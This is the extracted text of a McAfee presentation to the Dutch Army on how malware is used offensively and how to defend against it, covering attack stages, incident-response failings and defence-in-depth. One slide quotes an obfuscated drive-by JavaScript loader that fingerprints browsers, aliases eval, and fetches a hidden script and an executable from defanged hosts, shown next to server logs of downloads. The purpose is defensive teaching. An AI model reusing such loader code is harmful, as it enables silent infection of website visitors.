Embed Size (px)
DESCRIPTION
Presentation for the Dutch Army around cyberwarfare and the usage of malware.
Citation preview
Malware Offensive usage and how to defend
Christiaan Beek
McAfee Professional Services
Agenda
• $whoami
• Examples
• Offensive ways of using malware
• What goes wrong
• Defense recommendations
• Final thoughts
> whoami
• Christiaan Beek
• Practice lead IR & Forensics EMEA
• Developer/Instructor MFIRE
• Training CERTS
A Little Background
Foundstone Services – McAfee Strategic Security
OFFENSE
Offensive usage of malware
ENERGY & INFRA Financial MEDICAL
MOBILE Defense
Offensive usage of malware
Why malware?
• low profile during preparation
• many options to spread / infect
• many ways to hide
• self destruct mechanism
• many ways to transfer data to
Offensive usage of malware
• More and more discovery of malware frameworks
• Multiple modules /components
• Written by pro’s – sponsored by nations
Offensive - What’s Different?
Development Delivery Detection Command & Control Intent
• Nation-States
• Truly
customized
payloads
• Zero day
propagation
• Multi-vectored:
Blue tooth,
USB, network
• Digitally signed
with
compromised
certificates
• Outbound ex-
filtration
masking
• Central
command
• Modular
payloads
• Surveillance
• Disrupt /
Destroy
Stages of an attack:
Stages of an attack:
Stages of an attack:
Stages of an attack:
Stages of an attack – first script
script type="text/javascript" src="swfobject.js"></script>
<script src=jpg.js></script>
<script type="text/javascript">
if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 &&
hiOC2.indexOf("spider")==-1)
var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion();
var expires=new Date();
expires.setTime(expires.getTime()+1*60*60*1000);
document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString();
for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 &&
(navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length-
1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 =
eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new
function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e)
}
</script>
<DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript"
src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
Final destination?:
hxxp://222.7x.xx.xx.xx/x.exe
Inner working?
IIS logs on hacked ‘landing’ server:
9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe
9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe
Dial 80 Or 443
War story
Future usage of malware
Future scenario’s
Future scenario’s or real...?
Future scenario’s
Future scenario’s
Future scenario’s
Future scenario’s
Future scenario’s
Future scenario’s
An Intel company
What goes wrong regarding Defense?
An Intel company
Problem #1
Many solutions but how to use them?
Forensic Readiness?
An Intel company
Problem #2
No visibility on the network
No correlation of events
An Intel company
Problem #3
Lack of skilled,
experienced and
dedicated people
An Intel company
Problem #4
No Incident Response procedures
No Dry-run exercise
An Intel company
Problem #5
The attack came
from…..
An Intel company
Problem #6
Destroying evidence
An Intel company
Problem #7
who is the system owner?
who will take action?
who is allowed to take
decisions?
An Intel company
Defense Strategies
The Big “Threat” Picture
All Threats All Known
Threats
Threats
AntiVirus
Sees
Threats
AntiVirus
Protects
Core
The “Core” Security Problem
• “Unauthorized” Execution
– Payload/attachment/link
– Network
– Privilege
• “Authorized” Execution
– Insiders misuse of privilege
End Users = Data
Identity
Thieves Spammers
Tool
Developers
Vulnerability
Discoverers
Malware Developers
100101010010110
Bot Herder
Defense-in-depth
Worthless without:
An Intel company
Final thoughts......
- Incidents happen
- Is forensic & malware readiness on your agenda?
- What needs to be changed in your process?
- Is your {army-unit/company/agency/etc} prepared?
- Did you separate critical infrastructures?
- Can we help you?
An Intel company
Thank you!
Keep in touch:
Email: Christiaan_Beek@McAfee dot com
Twitter: @FSEMEA @Foundstone @ChristaanBeek
